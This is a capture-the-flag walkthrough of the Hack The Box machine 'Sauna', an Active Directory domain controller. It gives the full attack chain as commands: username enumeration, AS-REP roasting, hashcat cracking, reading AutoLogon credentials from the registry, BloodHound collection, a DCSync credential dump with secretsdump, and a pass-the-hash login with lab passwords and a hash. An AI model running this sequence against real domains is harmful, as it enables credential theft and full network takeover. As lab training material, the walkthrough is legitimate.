This is a walkthrough of the machine Sauna from Hack The Box.
Machine information:
- Difficulty: Easy
- OS: Windows
- Area of interest: Enterprise Network, Vulnerability Assessment, Active Directory, Security Tools, Authentication
- Vulnerability: Misconfiguration, Autologon Credentials
- Technique: Reconnaissance, User Enumeration, Password Cracking, ASREPRoasting, AD DCSync, Pass the Hash
Nmap
sudo nmap -A --open -v -p- <IP>Starting off with an Nmap scan, we discover that the machine is a domain controller, and that the domain name is egotistical-bank.local.
Webapp enumeration
Looking at the web application on port 80, we discover employees' names on the page /about.html:
Compiling a list of possible usernames
Using the discovered names, we can manually create a file of possibly valid usernames, including common permutations:
fergus.smith
shaun.coins
bowie.taylor
hugo.bear
steve.kerb
sophie.driver
fergus_smith
shaun_coins
bowie_taylor
hugo_bear
steve_kerb
sophie_driver
f.smith
s.coins
h.bear
b.taylor
s.kerb
s.driver
fsmith
scoins
hbear
btaylor
skerb
sdriver
AS-REP Roasting
Next, we will use the usernames we have created to try AS-REP roasting with impacket-GetNPUsers:
impacket-GetNPUsers -dc-ip <IP> -usersfile usernames EGOTISTICAL-BANK.LOCAL/And we get a hit on the user fsmith:
Initial access
We will use hashcat in order to crack this hash and get a plaintext credential:
hashcat -m 18200 fsmith.asrep /usr/share/wordlists/rockyou.txt --force
With a pair of credentials in hand, we can obtain initial access with evil-winrm, and read the first user.txt flag:
evil-winrm -i <IP> -u fsmith -p "Thestrokes23"
Lateral movement
Digging around the machine, eventually we find AutoLogon configured and obtain credentials from here, this can be discovered either using WinPEAS, or by querying the registry:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
However, note that the username from the registry; svc_loanmanager is invalid. Looking at existing users, we find a similarly named one; svc_loanmgr:
Using evil-winrm again, we can get a shell as svc_loanmgr:
evil-winrm -i <IP> -u svc_loanmgr -p "Moneymakestheworldgoround\!"
Privilege escalation
We will upload the SharpHound executable using evil-winrm:
upload SharpHound.exe
Next, we will start collection, save the output files and ingest them into BloodHound:
.\SharpHound.exe -c All --outputdirectory C:\Users\svc_loanmgr\Documents\ --outputprefix sauna
bloodhound
In BloodHound, we can click on our current user; svc_loanmgr, and check what outbound controls we have:
svc_loanmgr has GetChangesAll and GetChanges over the domain object. Clicking on each of these rights in BloodHound and reviewing the General and Linux Abuse tabs reveals that; when paired, we can execute a dcsync with impacket-secretsdump:
Finally, we can use impacket-secretsdump, and pass the dumped hash with evil-winrm to get a shell as administrator, and read the second root.txt flag:
impacket-secretsdump EGOTISTICAL-BANK/svc_loanmgr:"Moneymakestheworldgoround\!"@<IP> -just-dc
evil-winrm -i <IP> -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
